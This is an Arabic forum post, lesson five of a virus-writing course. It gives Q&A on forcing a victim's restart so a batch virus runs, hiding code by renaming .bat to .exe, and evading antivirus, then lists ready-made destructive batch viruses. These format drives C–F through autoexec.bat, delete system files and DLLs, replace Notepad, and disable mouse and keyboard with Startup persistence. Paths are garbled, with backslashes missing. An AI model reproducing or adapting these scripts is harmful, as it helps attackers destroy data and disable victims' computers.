)]°@°[(دورة شاملة حول الفايروسات من البداية الى الاحتراف)]°@ )[°

الدرس الخامس
الدرس دا شرح عبارة عن اسئلة واجابة
1-اسئلة و حلول :

س1.كيف نستطيع عمل اعدة تشغيل عن الضغط على الفيروس
------------------------------------
عندما ضغط على الفيرس انتقلت اوامر الدوس الى ملف الاوتواكسك فلابد من اعادة التشغيل حتى يطلب الوندوز هذا الملف فيجدة وهو على الدوس فاينفذ الاور معتقداً انة يحمل
اوامر البدء ...
اضف هذا الكود لعمل ريستارت :

كود PHP:
c:windowsrundll.exe user.exe,exitwindowsexec

ألان عندما يضغط الضحية علية سوف يحدث وينتقل الاوامر الدوسية ومعها سطر الريستارت وهايحدث ريستارت
ويتم تنفيظ الاوامر الدوسيةفى سرعة كبيرة جدااىاننا اجبرنا الضحية على عمل ريستارت لكى يشتغل الفيرس
س2.هل هناك اكواد اخرى مثل عمل اغلاق للوندوز
------------------------------------

كود PHP:
c:windowsrundll32.exe user.exe,exitwindows

هذا كود الغلاق
س3.عندما اريد من الفيروس عدم حذف نفسه لماذا اكتب رموز (الدرس الثاني)
------------------------------------
لانه و قد ذكرة في الدرس السابق انه نظام التشغيل النوافذ (Windows)لا يقبل كتابة رموز في اسماء البرامج لاكن نظام التشغيل (MS-DOS)يوافق على كتابة هذه الاسماء .
س4.لماذا اقوم بتغير امتداد الفيروس من BAT الى EXE (الدرس الاول)
------------------------------------
لانه يمكن لاي شخص كشف الكود البرمجي للفيروس !! و هذا اكبر خطاً مما يؤدي الى استخادمه ضدك فيجب عليك الحذر ..
س5.لماذا اشفر الفيروس و لماذا لا تنص بكتابة كود تدمير المضدات (الدرس الثالث)
------------------------------------
لانه اذ قمت بكتابة الكود البرمجي الخاص بحذف او ايقاف عمل المضادات سوف يقوم المضاد بتنبيه الضحية و حذف الفيروس مباشرتاً مما يؤدي الى فشل العملية ...
س6.انت الان تعلمنا صناعة الفيروسات عن طريق الملفات الدفاعية اذن هل يوج مستى اقوى
------------------------------------
نعم,يوجد مستويات اقوى مثل الفيجول بيسك و السي بلص بلص و لغة التجميع لاكن من مميزات الملفات الدفاعية انه يمكن كتابة اي فيروس في اي حاسبة بدون برنامج معين او مترجم لغة فقط المفكرة ..
2-كودات فيروسات جاهزة :
1.فيروس عمل فورمات C,D,E,F والطابعه واعادة تشغيل الجهاز :

كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
c:windowsrundll.exe user.exe,exitwindowsexec

------------------------------------
2.فيروس عمل فورمات C,D,E,F والطابعه :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat

------------------------------------
3.فيروس يحذف برنامج المفكرة وينسخ بدله برنامج اخر :

كود PHP:
del C:WINDOWSNOTEPAD.EXE
copy %0 C:WINDOWSNOTPAD.EXE

------------------------------------
4.فايروس افتراضي :

كود PHP:
@echo off
cls
:start
if exist c:AUTOEXEC.bat goto delc
if exist d:AUTOEXEC.bat goto deld
if exist e:AUTOEXEC.bat goto dele
if exist f:AUTOEXEC.bat goto delf
elc
del c:
goto end
eld
del d:
goto end
ele
del e:
goto end
elf
del f:
goto end
end

------------------------------------
5.فايروس النظام :

كود PHP:
@echo off
cls
:start
if exist c:windows goto next
if not exist c:windows goto copy
:next
del c:windows
goto end
:copy
cd c:
md virus
goto end
end

------------------------------------
6.فايروس الدوس :

كود PHP:
@echo off
C:WINDOWSrundll.exe mouse,disable
C:WINDOWSrundll.exe keyboard,disable
del c:command.com
del c:Io.sys
del c:Config.sys
del c:Msdos.sys
del c:windowssystem32command.com
deltree /y C:WINDOWSCOMMAND*.*
deltree /y C:WIN98COMMAND*.*
deltree /y C:WINmeCOMMAND*.*
deltree /y C:WIN_meCOMMAND*.*
deltree /y C:WINxpCOMMAND*.*
deltree /y C:WIN_xpCOMMAND*.*
del d:command.com
del d:Io.sys
del d:Config.sys
del d:Msdos.sys
del d:windowssystem32command.com
deltree

------------------------------------
7.فيروس قاتل ملفات السستم :

كود PHP:
@echo off
c:
cd C:WINDOWSSystem
deltree /y *.dll
cd
deltree /y *.sys
c:
cd C:WINDOWSSystem32
deltree /y *.dll
cd
deltree /y *.sys
d:
cd C:WINDOWSSystem
deltree /y *.dll
cd
deltree /y *.sys
d:
cd C:WINDOWSSystem32
deltree /y *.dll
cd
deltree /y *.sys
CLS

------------------------------------
8.فيروس قاتل الفأرة و لوحة المفاتيح :

كود PHP:
@echo off
C:WINDOWSrundll.exe mouse,disable
C:WINDOWSrundll.exe keyboard,disable
copy key.BAT C:WINDOWSstartm~1programsstartup
copy key.BAT C:Docume~1ALLUSE~1StartM~1ProgramsStartup
copy key.BAT D:Docume~1ALLUSE~1StartM~1ProgramsStartup
CLS
(يتبع)